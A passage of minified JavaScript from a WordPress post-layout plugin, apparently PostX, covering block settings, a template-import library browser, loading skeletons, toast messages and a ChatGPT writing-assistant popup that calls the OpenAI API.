"}]},viewIconSize:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count svg{ width:{{viewIconSize}}; height:{{viewIconSize}} }"}]},viewSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count > span.ultp-view-count-number { margin-left: {{viewSpace}} }"},{depends:[{key:"viewIconShow",condition:"==",value:!0},{key:"viewLabelAlign",condition:"==",value:"before"}],selector:"{{ULTP}} .ultp-view-count > svg { margin: {{viewSpace}} } {{ULTP}} .ultp-view-count .ultp-view-label {margin: 0px !important;}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},41977:(e,t,l)=>{"use strict";var o=l(67294),a=l(72567),i=l(52141),n=l(15648);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/view_count.svg",alt:"Post View Count"}),attributes:i.Z,edit:a.Z,save:()=>null})},75324:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(64766);const i=e=>{const{useState:t,useEffect:l,useRef:i,onChange:n,options:r,value:s,contentWH:p}=e,[c,u]=t(!1),d=i(null),m=e=>{d?.current&&!d?.current.contains(e.target)?u(!1):d?.current&&d?.current.contains(e.target)&&!e.target.classList?.contains("ultp-reserve-button")&&u(!d?.current.classList?.contains("open"))};l((()=>(document.addEventListener("mousedown",m),()=>document.removeEventListener("mousedown",m))),[]);const g=r?.find((e=>e.value===s));return(0,o.createElement)("div",{ref:d,className:"starter_filter_select "+(c?"open":"")},(0,o.createElement)("div",{className:"starter_filter_selected"},g?g.label:"Select an option",a.ZP.collapse_bottom_line),c&&(0,o.createElement)("ul",{className:"starter_filter_select_options",style:{minWidth:p?.width||"100px",maxHeight:p?.height||"160px"}},r.map(((e,t)=>(0,o.createElement)("li",{className:"ultp-reserve-button starter_filter_select_option",key:t,onClick:()=>(e=>{u(!1),n(e.value)})(e)},e.label)))))}},70439:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(64766),i=l(12402),n=l(87763),r=l(75324);const{__}=wp.i18n,s=e=>{const{changeStates:t,column:l,showWishList:s,_fetchFile:p,fetching:c,searchQuery:u,fields:d,fieldValue:m,fieldOptions:g,useState:y,useEffect:b,useRef:v}=e;return(0,o.createElement)("div",{className:"ultp-templatekit-layout-search-container"},(0,o.createElement)("div",{className:"ultp-templatekit-search-container"},d?.filter&&(0,o.createElement)(o.Fragment,null," ",(0,o.createElement)("span",null,__("Filter:","ultimate-post")),(0,o.createElement)(r.Z,{useState:y,useEffect:b,useRef:v,value:m?.filter,contentWH:{height:"190px",width:"150px"},onChange:e=>{t("filter",e)},options:g?.filterArr||[]})),d?.trend&&m?.trend&&(0,o.createElement)(r.Z,{useState:y,useEffect:b,useRef:v,value:m?.trend,onChange:e=>{t("trend",e)},options:[{value:"all",label:__("Popular / Latest","ultimate-post")},{value:"popular",label:__("Popular","ultimate-post")},{value:"latest",label:__("Latest","ultimate-post")}]}),d?.freePro&&(0,o.createElement)(r.Z,{useState:y,useEffect:b,useRef:v,value:m?.freePro,onChange:e=>{t("freePro",e)},options:[{value:"all",label:__("Free / Pro","ultimate-post")},{value:"free",label:__("Free","ultimate-post")},{value:"pro",label:__("Pro","ultimate-post")}]})),(0,o.createElement)("div",{className:"ultp-templatekit-layout-container"},(0,o.createElement)(i.Z,{changeStates:t,searchQuery:u}),(0,o.createElement)("span",{className:"ultp-templatekit-iconcol2 "+("2"==l?"ultp-lay-active":""),onClick:()=>t("column","2")},n.Z.grid_col1),(0,o.createElement)("span",{className:"ultp-templatekit-iconcol3 "+("3"==l?"ultp-lay-active":""),onClick:()=>t("column","3")},n.Z.grid_col2),(0,o.createElement)("div",{className:"ultp-premade-wishlist-con"},(0,o.createElement)("span",{className:"ultp-premade-wishlist cursor "+(s?"ultp-wishlist-active":""),onClick:()=>{t("wishlist",!s)}},a.ZP[s?"love_solid":"love_line"])),p&&(0,o.createElement)("div",{onClick:()=>p(),className:"ultp-filter-sync"},(0,o.createElement)("span",{className:"dashicons dashicons-update-alt "+(c?" rotate":"")}),__("Synchronize","ultimate-post"))))}},86008:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(60448),i=l(64766),n=l(8949),r=l(90356),s=l(70439);const{__}=wp.i18n,p=[{label:__("All","ultimate-post"),value:"all"},{label:__("Menu - PostX","ultimate-post"),value:"menu"},{label:__("Post Grid #1","ultimate-post"),value:"post-grid-1"},{label:__("Post Grid #2","ultimate-post"),value:"post-grid-2"},{label:__("Post Grid #3","ultimate-post"),value:"post-grid-3"},{label:__("Post Grid #4","ultimate-post"),value:"post-grid-4"},{label:__("Post Grid #5","ultimate-post"),value:"post-grid-5"},{label:__("Post Grid #6","ultimate-post"),value:"post-grid-6"},{label:__("Post Grid #7","ultimate-post"),value:"post-grid-7"},{label:__("Post List #1","ultimate-post"),value:"post-list-1"},{label:__("Post List #2","ultimate-post"),value:"post-list-2"},{label:__("Post List #3","ultimate-post"),value:"post-list-3"},{label:__("Post List #4","ultimate-post"),value:"post-list-4"},{label:__("Post Slider #1","ultimate-post"),value:"post-slider-1"},{label:__("Post Slider #2","ultimate-post"),value:"post-slider-2"},{label:__("Post Module #1","ultimate-post"),value:"post-module-1"},{label:__("Post Module #2","ultimate-post"),value:"post-module-2"},{label:__("News ticker","ultimate-post"),value:"news-ticker"},{label:__("Taxonomy","ultimate-post"),value:"ultp-taxonomy"},{label:__("Table of Contents","ultimate-post"),value:"table-of-content"},{label:__("Button Group","ultimate-post"),value:"button-group"},{label:__("List - PostX","ultimate-post"),value:"advanced-list"},{label:__("Search - PostX","ultimate-post"),value:"advanced-search"},{label:__("Accordion","ultimate-post"),value:"accordion"},{label:__("Star Ratings","ultimate-post"),value:"star-rating"},{label:__("Tabs","ultimate-post"),value:"tabs"},{label:__("PostX Gallery","ultimate-post"),value:"gallery"},{label:__("Youtube Gallery","ultimate-post"),value:"youtube-gallery"}],c=[{value:"all",label:__("All Categories","ultimate-post")},{value:"news",label:__("News","ultimate-post")},{value:"magazine",label:__("Magazine","ultimate-post")},{value:"blog",label:__("Blog","ultimate-post")},{value:"sports",label:__("Sports","ultimate-post")},{value:"fashion",label:__("Fashion","ultimate-post")},{value:"tech",label:__("Tech","ultimate-post")},{value:"travel",label:__("Travel","ultimate-post")},{value:"food",label:__("Food","ultimate-post")},{value:"movie",label:__("Movie","ultimate-post")},{value:"health",label:__("Health","ultimate-post")},{value:"gaming",label:__("Gaming","ultimate-post")},{value:"nft",label:__("NFT","ultimate-post")}],u=(e,t,l)=>`${e}/wp-content/uploads/sites/${t}/postx_importer_img/pages/${l.toLowerCase().replaceAll(" ","_")}.jpg`,d=({starterListModule:e,starterLists:t,setStarterListModule:l,useState:a,state:n,importStarterTemplate:r})=>{const s=t?.filter((t=>t.live==e)),{title:p,live:c,pro:d}=s[0],{templates:m}=s[0];["contact","about","blog","home"].forEach((e=>{m.forEach(((t,l)=>{t.name.toLowerCase().includes(e)&&m.splice(0,0,m.splice(l,1)[0])}))}));const[g,y]=a(m[0].name),[b,v]=a(m[0].ID),h=m?.filter((e=>e.ID==b))[0],f=c+("page"==h.type?"home_page"==h.home_page?"":"/"+h.name?.toLowerCase().replaceAll(" ","-"):"/postx_"+("archive"==h.builder_type?h.archive_type:h.builder_type));return(0,o.createElement)("div",null,(0,o.createElement)("div",{className:"ultp-module-templates-footer"},(0,o.createElement)("div",{className:"ultp-module-title"},(0,o.createElement)("span",{onClick:()=>l("")}," ",i.ZP.collapse_bottom_line," Back"," ")," ",p),(0,o.createElement)("div",{className:"ultp-module-btn"},"ultp_builder"!=h.type&&(!ultp_data.active&&d?(0,o.createElement)("a",{className:"ultp-btns ultpProBtn",target:"_blank",href:"https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=starter-site-upgrade&utm_campaign=postx-dashboard#pricing",rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),"  ➤"):(0,o.createElement)("button",{onClick:()=>r("https://postxkit.wpxpo.com/"+c,b,d),className:`ultp-template-btn ultp-template-btn-fill ${n.reload?"s_loading":""} `},__("Import Template","ultimate-post")," ",i.ZP[n.reload?"refresh":"upload_solid"])),"ultp_builder"==h.type&&(0,o.createElement)("a",{href:ultp_data.builder_url,target:"_blank",className:"ultp-template-btn ultp-template-btn-fill",rel:"noreferrer"},__("Go to Site Builder","ultimate-post")),(0,o.createElement)("a",{href:"https://postxkit.wpxpo.com/"+f,target:"_blank",className:"ultp-template-btn ultp-template-btn-line",rel:"noreferrer"},__("Live Preview","ultimate-post")," ",i.ZP.eye))),(0,o.createElement)("div",{className:"ultp-module"},(0,o.createElement)("div",null,m?.length&&(0,o.createElement)("div",{className:"ultp-module-templates"},m.map((({type:e,name:t,img:l,ID:a},i)=>!("ultp_builder"==e&&t.toLowerCase().includes("header")||t.toLowerCase().includes("footer"))&&(0,o.createElement)("div",{key:t,className:"ultp-module-item "+(b==a?"active":""),onClick:()=>{v(a),y(t)}},(0,o.createElement)("div",{className:"bg-image-aspect",style:{backgroundImage:`url(${u("https://postxkit.wpxpo.com/"+c,s[0].ID,t)})`}}),(0,o.createElement)("div",{className:"ultp-module-info"},t)))))),(0,o.createElement)("div",null,"ultp_builder"==h.type&&(0,o.createElement)("div",{className:"ultp-module-notice"},(0,o.createElement)("strong",null,__("Note:","ultimate-post"))," ",__("This is a builder template. Go to","ultimate-post")," ",(0,o.createElement)("a",{href:ultp_data.builder_url,target:"_blank",rel:"noreferrer"}," ",__("Site Builder","ultimate-post"))," ",__("and explore more","ultimate-post")),(0,o.createElement)("div",{className:"ultp-module-page"},(0,o.createElement)("img",{key:g,src:`https://postxkit.wpxpo.com/${c}/wp-content/uploads/sites/${s[0].ID}/postx_importer_img/pages/large/${g.toLowerCase().replaceAll(" ","_")}.jpg`,alt:g})))))},m=e=>{const{filterValue:t,state:l,setState:m,useState:g,useEffect:y,useRef:b,_changeVal:v,splitArchiveData:h,dashboard:f,setWListAction:k,wishListArr:w,starterListModule:x,setStarterListModule:T}=e,{current:_,isStarterLists:C,error:E,starterLists:S,designs:P,reload:L,reloadId:I,fetching:B,loading:U,starterChildLists:M,starterParentLists:A}=l,H=f?ultp_dashboard_pannel:ultp_data,[N,j]=g("3"),[Z,O]=g(""),[R,D]=g("all"),[z,F]=g("all"),[W,V]=g(!1),[G,q]=g({state:!1,status:""}),$="front_page"==H?.archive;let K=[..._],J=!!C&&!Z;const Y=["singular","archive","header","footer","404"].includes(H.archive);C&&Z&&(K=[...M],J=!1),"latest"==R||"all"==R?K.sort(((e,t)=>t.ID-e.ID)):"popular"==R&&K[0]&&K[0].hit&&K.sort(((e,t)=>t.hit-e.hit));const X=(e,t,o)=>{o&&!H.active||(m({...l,reload:!0,reloadId:t}),wp.apiFetch({path:"/ultp/v3/single_page_import",method:"POST",data:{api_endpoint:e,ID:t}}).then((e=>{e.success&&(wp.data.dispatch("core/block-editor").insertBlocks(wp.blocks.parse(e.content.content)),T(""),m({...l,isPopup:!1,reload:!1,reloadId:"",error:!1}))})))};let Q=(0,a.cC)(w.join(""),[]);return Q&&"object"==typeof Q&&!Array.isArray(Q)&&(Q=Object.keys(Q).sort(((e,t)=>e-t)).map((e=>Q[e]))),(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-templatekit-wrap"},G.state&&(0,o.createElement)(r.Z,{delay:2e3,toastMessages:G,setToastMessages:q}),(0,o.createElement)("div",{className:"ultp-templatekit-list-container "+(C&&x?"ultp-block-editor":"")},(C&&!x||!C)&&(0,o.createElement)(s.Z,{changeStates:(e,t)=>{"freePro"==e?F(t):"search"==e?O(t):"column"==e?j(t):"wishlist"==e?V(t):"trend"==e?D(t):"filter"==e&&(e=>{let t=[];const o=C?"starterListsFilter":"designFilter";t=C?S:P,m("all"==e?{...l,[o]:e,current:t}:{...l,[o]:e,current:C?t.filter((t=>t.parent_cat&&(Array.isArray(t.parent_cat)?t.parent_cat:Object.values(t.parent_cat||{})).includes(e)||t.category==e)):h(t,e)})})(t)},useState:g,useEffect:y,useRef:b,column:N,showWishList:W,searchQuery:Z,fetching:B,fields:{filter:!Y,trend:!0,freePro:!0},fieldOptions:{filterArr:!Y&&(C?c:p),trendArr:[],freeProArr:[]},fieldValue:{filter:Y?"all":t,trend:R,freePro:z}}),x&&C&&!Y?(0,o.createElement)(d,{useState:g,starterListModule:x,starterLists:S,setStarterListModule:T,importStarterTemplate:X,state:l,setState:m}):K?.length>0?(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-premade-grid ultp-templatekit-col"+N},K.map(((e,t)=>(Y||$?(e.name+" "+e.parent)?.toLowerCase().includes(Z.toLowerCase()):(C&&!Z?e.title:e.name)?.toLowerCase().includes(Z.toLowerCase()))&&(Z&&(C&&"ultp_builder"!=e.type||!C)||!Z)&&("all"==z||"pro"==z&&e.pro||"free"==z&&!e.pro)&&(!W||W&&Q?.includes(e.ID))&&(0,o.createElement)("div",{key:t,className:`ultp-item-wrapper ${J?"ultp-starter-group":""} ${e.parent?"ultp-single-item":""}`},(0,o.createElement)("div",{className:"ultp-item-list"},(0,o.createElement)("div",{className:"ultp-item-list-overlay"},(0,o.createElement)("a",{className:`ultp-templatekit-img ${["header","footer"].includes(e.builder_type)?"ultp_hf":""} ${Y||C||$?" bg-image-aspect":""} `,style:Y||$?{backgroundImage:`url(https://postxkit.wpxpo.com/${e.live}/wp-content/uploads/sites/${e.parentID}/postx_importer_img/pages/${e.name?.toLowerCase().replaceAll(" ","_")}.jpg )`}:C?{backgroundImage:`url(${J?u("https://postxkit.wpxpo.com/"+e.live,e.ID,"home"):u("https://postxkit.wpxpo.com/"+A[e.parent]?.live,A[e.parent]?.ID,e.name)})`}:{}},!(Y||C||$)&&(0,o.createElement)("img",{src:e.image,loading:"lazy",alt:e.name})),(0,o.createElement)("div",{className:"ultp-list-dark-overlay"},!H.active&&(0,o.createElement)(o.Fragment,null,e.pro?(0,o.createElement)("span",{className:"ultp-templatekit-premium-btn"},__("Pro","ultimate-post")):(0,o.createElement)("span",{className:"ultp-templatekit-premium-btn ultp-templatekit-premium-free-btn"},__("Free","ultimate-post"))),C?(0,o.createElement)(o.Fragment,null,J?(0,o.createElement)("a",{className:"ultp-overlay-view",onClick:()=>{T(e.live)}},i.ZP.search_line):(0,o.createElement)("a",{className:"ultp-overlay-view ultp-dashboverlay",href:"https://postxkit.wpxpo.com/"+e.live+"/"+e.name.toLowerCase().replaceAll(" ","-"),target:"_blank",rel:"noreferrer"},(0,o.createElement)("span",{className:"dashicons dashicons-visibility"})," ",__("Live Preview","ultimate-post"))):(0,o.createElement)("a",{className:"ultp-overlay-view ultp-dashboverlay "+(["header","footer"].includes(e.builder_type)?"ultp_hf":""),href:Y||$?"https://postxkit.wpxpo.com/"+($||["header","footer"].includes(e.builder_type)?e.live:e.live+"/postx_"+("archive"==e.builder_type?e.archive_type:e.builder_type)):`https://www.wpxpo.com/postx/patterns/#demoid${e.ID}`,target:"_blank",rel:"noreferrer"},(0,o.createElement)("span",{className:"dashicons dashicons-visibility"})," ",__("Live Preview","ultimate-post")))),(0,o.createElement)("div",{className:"ultp-item-list-info"},(0,o.createElement)("div",{className:"ultp-list-info"},C?Z?(0,o.createElement)(o.Fragment,null,(0,o.createElement)("span",null,e.name),(0,o.createElement)("div",{className:"parent"},e.parent," ")):(0,o.createElement)(o.Fragment,null,(0,o.createElement)("span",null,e.title),(0,o.createElement)("div",{className:"parent"},e?.templates?.length+" templates"," ")):(0,o.createElement)("span",null,e.name,(Y||$)&&(0,o.createElement)("div",{className:"parent"},e.parent," "))),(0,o.createElement)("span",{className:"ultp-action-btn"},(0,o.createElement)("span",{className:"ultp-premade-wishlist",onClick:()=>{k(e.ID,Q?.includes(e.ID)?"remove":"")}},i.ZP[Q?.includes(e.ID)?"love_solid":"love_line"]),C?Z&&(0,o.createElement)(o.Fragment,null,e.pro&&!H.active?(0,o.createElement)("a",{className:"ultp-btns ultpProBtn",target:"_blank",href:"https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=starter-site-upgrade&utm_campaign=postx-dashboard#pricing",rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),"  ➤"):"ultp_builder"!==e.type&&(0,o.createElement)("span",{onClick:()=>X("https://postxkit.wpxpo.com/"+e.live,e.ID,e.pro),className:"ultp-btns ultp-btn-import"},!(L&&I==e.ID)&&i.ZP.arrow_down_line,__("Import","ultimate-post"),L&&I==e.ID&&(0,o.createElement)("span",{className:"dashicons dashicons-update rotate"}))):e.pro&&!H.active?(0,o.createElement)("a",{className:"ultp-btns ultpProBtn",target:"_blank",href:`https://www.wpxpo.com/postx/${Y?`?utm_source=db-postx-builder&utm_medium=${H?.archive}-buider-library&utm_campaign=postx-dashboard`:"?utm_source=db-postx-editor&utm_medium=pattern-upgrade&utm_campaign=postx-dashboard"}#pricing`,rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),"  ➤"):(0,o.createElement)("span",{onClick:()=>{Y||$?X("https://postxkit.wpxpo.com/"+e.live,e.ID,e.pro):v(e.ID,e.pro)},className:"ultp-btns ultp-btn-import"},!(L&&I==e.ID)&&i.ZP.arrow_down_line,__("Import","ultimate-post"),L&&I==e.ID&&(0,o.createElement)("span",{className:"dashicons dashicons-update rotate"}))))),(0,o.createElement)("div",{className:(C&&!Y&&$?"ultp-starter-shape":"ultp-shape-hide")+" "})))))):(0,o.createElement)(o.Fragment,null,U?(0,o.createElement)("div",{className:"ultp-premade-grid ultp-templatekit-col3 skeletonOverflow"},Array(25).fill(1).map(((e,t)=>(0,o.createElement)("div",{key:t,className:"ultp-item-list"},(0,o.createElement)("div",{className:"ultp-item-list-overlay"},(0,o.createElement)(n.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:400,unit2:"px"}})),(0,o.createElement)("div",{className:"ultp-item-list-info"},(0,o.createElement)(n.Z,{type:"custom_size",c_s:{size1:50,unit1:"%",size2:25,unit2:"px",br:2}}),(0,o.createElement)("span",{className:"ultp-action-btn"},(0,o.createElement)("span",{className:"ultp-premade-wishlist"},(0,o.createElement)(n.Z,{type:"custom_size",c_s:{size1:30,unit1:"px",size2:25,unit2:"px",br:2}})),(0,o.createElement)(n.Z,{type:"custom_size",c_s:{size1:70,unit1:"px",size2:25,unit2:"px",br:2}}))))))):(0,o.createElement)("span",{className:"ultp-image-rotate"},__("No Data found…","ultimate-post"))))))}},8949:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);l(40619);const a=e=>{const{type:t,size:l,loop:a,unit:i,c_s:n,classes:r}=e,s=()=>{let e={};switch(t){case"image":case"circle":e={width:l?l+"px":"300px",height:l?l+"px":"300px"};break;case"title":e={width:`${l||"100"}${i||"%"}`};break;case"button":e={width:l?l+"px":"90px"};break;case"custom_size":e={width:`${n.size1?n.size1:"100"}${n.unit1?n.unit1:"%"}`,height:`${n.size2?n.size2:"20"}${n.unit2?n.unit2:"px"}`,borderRadius:n.br?n.br+"px":"0px"}}return e};return(0,o.createElement)(o.Fragment,null,a?(0,o.createElement)(o.Fragment,null,Array(parseInt(a)).fill("1").map(((e,l)=>(0,o.createElement)("div",{key:l,className:`ultp_skeleton__${t} ultp_frequency loop ${r||""}`,style:s()})))):(0,o.createElement)("div",{className:`ultp_skeleton__${t} ultp_frequency ${r||""}`,style:s()}))}},90356:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);l(42413);const{__}=wp.i18n,a=({delay:e,toastMessages:t,setToastMessages:l})=>{const[a,i]=(0,o.useState)(!0),[n,r]=(0,o.useState)("show");return(0,o.useEffect)((()=>{const t=setTimeout((()=>{i(!1),r(""),l({state:!1,status:""})}),e);return()=>clearTimeout(t)}),[e]),(0,o.createElement)("div",{className:"toast"},a&&t.status&&t.messages.length>0&&(0,o.createElement)("div",{className:"toastMessages"},t.messages.map(((e,a)=>(0,o.createElement)("span",{key:`toast_${Date.now().toString()}_${a}`},(0,o.createElement)("div",{className:`toaster ${n}`},(0,o.createElement)("span",null,"error"==t.status?(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"animation",stroke:"currentColor"},(0,o.createElement)("circle",{cx:"26",cy:"26",r:"25",fill:"none",className:"circle cross"}),(0,o.createElement)("path",{fill:"none",d:"M 12,12 L 40,40 M 40,12 L 12,40",className:"check"})):(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"animation",stroke:"currentColor"},(0,o.createElement)("circle",{className:"circle",cx:"26",cy:"26",r:"25",fill:"none"}),(0,o.createElement)("path",{className:"check",fill:"none",d:"M14.1 27.2l7.1 7.2 16.7-16.8"}))),(0,o.createElement)("span",{className:"itmCenter"},e),(0,o.createElement)("span",{className:"itmLast",onClick:()=>(e=>{let o=[...t.messages];o=o.filter(((t,l)=>l!==e)),l({...t,messages:o})})(a)},__("Close","ultimate-post"))))))))}},25364:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294);l(19552);const{__}=wp.i18n,{useState:a,useEffect:i,useRef:n}=wp.element,{rawHandler:r}=wp.blocks,{store:s}=wp.blockEditor,p=e=>{const{fromEditPostToolbar:t,onChange:l,value:p}=e,c=n(),[u,d]=a(""),[m,g]=a(""),[y,b]=a(""),[v,h]=a(""),[f,k]=a(""),[w,x]=a(""),[T,_]=a(e.isShow||!1),[C,E]=a(p?.text?p.start==p.end?p.text:p.text.substring(p.start,p.end):""),S=e=>{27===e.keyCode&&(document.querySelector(".ultp-builder-modal").remove(),_(!1))};i((()=>(document.addEventListener("keydown",S),()=>document.removeEventListener("keydown",S))),[]);const P=(e,t)=>{const l=e.replace("%s",C);f?h("There is an ongoing process. Kindly hold on for a moment."):(async(e,t)=>{let l="",o="";k(t);try{let t="https://api.openai.com/v1/chat/completions";const a=ultp_data.settings.chatgpt_secret_key,i=ultp_data.settings.chatgpt_model,n=ultp_data.settings.chatgpt_response_time||35,r=ultp_data.settings.chatgpt_max_tokens||200;let s="";if("gpt-3.5-turbo"==i||"gpt-4"==i?s={model:i,messages:[{role:"user",content:e}]}:"text-davinci-002"!=i&&"text-davinci-003"!=i||(t="https://api.openai.com/v1/completions",s={model:i,prompt:e,max_tokens:r}),s){const e=await fetch(t,{method:"POST",headers:{"Content-Type":"application/json",Authorization:`Bearer ${a}`},timeout:n,body:JSON.stringify(s)}),r=await e.json();r?.choices?.length>0&&(r?.choices[0]?.message?.content||r?.choices[0]?.text)?o="text-davinci-002"==i||"text-davinci-003"==i?r.choices[0].text:r.choices[0].message.content:r?.error&&(l="invalid_api_key"==r?.error.code?__("Your OpenAI API Secret Key is invalid. Please save a valid key.","ultimate-post"):"model_not_found"==r?.error?.code&&r?.error?.message?.includes("gpt-4")?__("You are not eligible to use GPT-4 model. Please contact OpenAI to get the access.","ultimate-post"):__("Due to some error, we could not get response from OpenAI server. Please try again.","ultimate-post"))}}catch(e){l=__("Due to some error, we could not get response from OpenAI server. Please try again.","ultimate-post")}h(l),l||E(o),k("")})(l,t)},L=()=>{let e=c.current.value;e?(m&&(e+=" in "+m+" style"),u&&(e+=" using "+u+" tone"),y&&(e+=" translate in "+y+" language"),P(e,"extra")):h("No prompt detected.")},I=e=>(0,o.createElement)("div",{className:"ultp-btn-item"},(0,o.createElement)("select",{value:"tone"==e.loading?u:"style"==e.loading?m:y,onChange:t=>{switch(C&&P(e.prompt.replace("%t",t.target.value),e.loading),e.loading){case"tone":d(t.target.value);break;case"style":g(t.target.value);break;case"language":b(t.target.value)}}},e.options.map(((e,t)=>(0,o.createElement)("option",{key:t,value:e.includes("-")?"":e.toLowerCase()},e)))),B(e.loading)),B=e=>f==e?(0,o.createElement)("span",{className:"chatgpt-loader"}):"";return(0,o.createElement)(o.Fragment,null,T&&(0,o.createElement)("div",{className:"ultp-builder-modal-shadow ultp-chatgpt-popup"},(0,o.createElement)("div",{className:"ultp-popup-wrap"},(0,o.createElement)("div",{className:"ultp-popup-header"},(0,o.createElement)("div",{className:"ultp-popup-filter-title"},(0,o.createElement)("div",{className:"ultp-popup-filter-image-head"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/addons/ChatGPT.svg"}),(0,o.createElement)("span",null,__("ChatGPT","ultimate-post"))),(0,o.createElement)("div",{className:"ultp-popup-filter-sync-close"},(0,o.createElement)("button",{className:"ultp-btn-close",onClick:()=>(()=>{const e=document.querySelector(".ultp-builder-modal");e.length>0&&e.remove(),_(!1)})(),id:"ultp-btn-close"},(0,o.createElement)("span",{className:"dashicons dashicons-no-alt"}))))),(0,o.createElement)("div",{className:"ultp-chatgpt-wrap "+(ultp_data.settings.chatgpt_secret_key?"":"ultp-chatgpt-nokey")},(0,o.createElement)("div",{className:"ultp-chatgpt-input-container"},(0,o.createElement)("div",{className:"ultp-chatgpt-popup-content"},!ultp_data.settings.chatgpt_secret_key&&(0,o.createElement)("div",{className:"ultp-chatgpt-api-warning"},(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"27.3",height:"24"},(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:"a"},(0,o.createElement)("path",{fill:"#ffa62c",d:"M0 0h27v24H0z"}))),(0,o.createElement)("g",{clipPath:"url(#a)"},(0,o.createElement)("path",{fill:"#ffa62c",d:"M27 21 15 0a1 1 0 0 0-3 0L0 21a1 1 0 0 0 1 2h25a1 1 0 0 0 1-2m-12-2a1 1 0 1 1 0-1 1 1 0 0 1 0 1m0-5a1 1 0 1 1-3 0V8a1 1 0 0 1 3 0Z"})))," ","Apply"," ",(0,o.createElement)("a",{href:"https://platform.openai.com/account/api-keys",target:"blank"}," ","API key"," ")," ","to use ChatGPT"),v&&(0,o.createElement)("div",{className:"ultp-error-notice"},v),C?(0,o.createElement)("textarea",{type:"text",onChange:e=>E(e.target.value),value:C}):(0,o.createElement)("div",{className:"ultp-chatgpt-search"},(0,o.createElement)("input",{ref:c,type:"text",value:w,placeholder:"Ask Anything",onChange:e=>x(e.target.value),onKeyDown:e=>{"Enter"!==e.key||f||L()}}),(0,o.createElement)("button",{className:"button ultp-ask-chatgpt-button",onClick:e=>{f||L()}},f?B("extra"):(0,o.createElement)("i",{className:"dashicons dashicons-search"})," ","Ask ChatGPT")),(0,o.createElement)("div",{className:"ultp-btn-items"},C&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('rewrite this sentences "%s"',"rewrite")},"Rewrite"," ",B("rewrite")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('improve this sentences "%s"',"improve")},"Improve"," ",B("improve")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('make shorter this sentences "%s"',"shorter")},"Make Shorter"," ",B("shorter")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('make longer this sentences "%s"',"longer")},"Make Longer"," ",B("longer")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('summarize this sentences "%s"',"summarize")},"Summarize"," ",B("summarize")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('Write a introduction of this sentences "%s"',"introduction")},"Introduction"," ",B("introduction")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('Write a conclusion of this sentences "%s"',"conclusion")},"Conclusion"," ",B("conclusion")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('Convert to Passive Voice of this sentences "%s"',"passive")},"Convert to Passive Voice"," ",B("passive")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('Convert to Active Voice of this sentences "%s"',"active")},"Convert to Active Voice"," ",B("active")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('make a paraphrase of this sentences "%s"',"phrase")},"Paraphrase"," ",B("phrase")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('make a outline of this sentences "%s"',"outline")},"Outline"," ",B("outline"))),(0,o.createElement)(I,{loading:"style",prompt:'write this sentences using %t style "%s"',options:["- Writing Style -","Descriptive","Expository","Narrative","Normal","Persuasive"]}),(0,o.createElement)(I,{loading:"tone",prompt:'write this sentences using %t tone "%s"',options:["- Writing Tone -","Assertive","Cooperative","Curious","Encouraging","Formal","Friendly","Informal","Optimistic","Surprised","Worried"]}),(0,o.createElement)(I,{loading:"language",prompt:'translate this sentences in %t language "%s"',options:["- Writing Language -","Arabic","Bengali","English","French","German","Hindi","Italian","Indonesian","Japanese","Javanese","Korean","Mandarin Chinese","Marathi","Norwegian","Polish","Portuguese","Punjabi","Russian","Spanish","Telugu","Thai","Turkish","Urdu","Vietnamese","Wu Chinese"]})),C&&(0,o.createElement)("div",{className:"ultp-center"},(0,o.createElement)("span",{onClick:()=>{_(!1),(e=>{if(t){const t=wp.blocks.createBlock("core/html",{content:e});wp.data.dispatch("core/block-editor").insertBlock(t,wp.data.select("core/block-editor").getBlockCount()),wp.data.dispatch(s).replaceBlock(t.clientId,r({HTML:t.attributes.content}))}else{const t=p.start==p.end?e:p.text.substring(0,p.start)+e+p.text.substring(p.end);l(wp.richText.create({text:t}))}})(C)},className:"ultp-btn ultp-btn-primary"},(0,o.createElement)("span",{className:"dashicons dashicons-arrow-down-alt"})," ",__("Import","ultimate-post")),(0,o.createElement)("span",{onClick:()=>E(""),className:"ultp-btn ultp-btn-transparent"},(0,o.createElement)("span",{className:"dashicons dashicons-plus"})," ",__("New 